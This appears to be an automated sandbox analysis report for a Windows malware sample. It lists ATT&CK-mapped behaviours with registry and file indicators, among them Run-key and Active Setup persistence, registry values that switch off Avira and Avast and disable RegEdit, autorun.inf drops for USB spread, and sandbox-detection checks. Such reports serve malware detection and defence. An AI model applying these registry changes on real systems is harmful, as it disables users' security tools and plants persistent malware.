2e5731639e0f5eed877b8a6efc4f765e0afcf1065f5046f963abcc9df818a163

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride = "1"	reg.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 9 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

T1564.001

pid	Process
6052	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	cmd.exe

Modifies file permissions 1 TTPs 12 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1348	icacls.exe
2484	icacls.exe
4812	icacls.exe
2676	icacls.exe
2728	icacls.exe
2580	icacls.exe
2584	icacls.exe
2748	icacls.exe
3764	icacls.exe
4220	icacls.exe
1824	icacls.exe
3716	icacls.exe

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\TITLE = "Tumeg doesn't want to upload your files LOL!"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartupScript = "C:\\Windows\\System32\\config\\startup2.bat"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartupScript = "C:\\Windows\\System32\\config\\startup3.bat"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartupScript = "C:\\Windows\\System32\\config\\startup4.bat"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartupScript = "C:\\Windows\\System32\\config\\startup5.bat"	reg.exe

Checks for any installed AV software in registry 1 TTPs 6 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Avira	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Avira\ProductEnabled	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Avira\ProductEnabled = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\aswidsagenta	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\aswidsagenta = "0"	reg.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

defense_evasion privilege_escalation

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe

Drops autorun.inf file 1 TTPs 4 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf	attrib.exe
File created	C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf	cmd.exe
File opened for modification	C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf	cmd.exe
File opened for modification	C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf	attrib.exe

Drops file in System32 directory 14 IoCs

description	ioc	Process
File created	C:\Windows\System32\config\startup4.bat	cmd.exe
File opened for modification	C:\Windows\System32\config\msg.vbs	cmd.exe
File created	C:\Windows\System32\config\msg2.vbs	cmd.exe
File opened for modification	C:\Windows\System32\config\startup.bat	cmd.exe
File opened for modification	C:\Windows\System32\config\startup2.bat	cmd.exe
File opened for modification	C:\Windows\System32\config\startup5.bat	cmd.exe
File opened for modification	C:\Windows\System32\config\startup3.bat	cmd.exe
File created	C:\Windows\System32\config\startup5.bat	cmd.exe
File opened for modification	C:\Windows\System32\config\startup4.bat	cmd.exe
File created	C:\Windows\System32\config\regs.reg	cmd.exe
File created	C:\Windows\System32\config\msg.vbs	cmd.exe
File created	C:\Windows\System32\config\startup.bat	cmd.exe
File created	C:\Windows\System32\config\startup2.bat	cmd.exe
File created	C:\Windows\System32\config\startup3.bat	cmd.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\49faf4e9-5e20-4d26-8804-5b62963c0811.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241122101144.pma	setup.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf	attrib.exe
File created	C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf	cmd.exe
File opened for modification	C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf	cmd.exe
File opened for modification	C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf	attrib.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2456	sc.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

Create Process with Token

T1134.002

pid	Process
5712	reg.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3700	reg.exe
1448	PING.EXE
3804	PING.EXE

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
5956	ipconfig.exe

Kills process with taskkill 2 IoCs

pid	Process
3400	taskkill.exe
2964	taskkill.exe

Modifies File Icons 2 IoCs

ransomware

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\ProgramData\\Microsoft\\Device Stage\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"	reg.exe

Modifies Internet Explorer settings 1 TTPs 12 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2319007114-3335580451-2147236418-1000\{C7E1DAF5-2D86-4432-AABA-77087C1335FD}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133741666358165339"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "856"	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "856"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
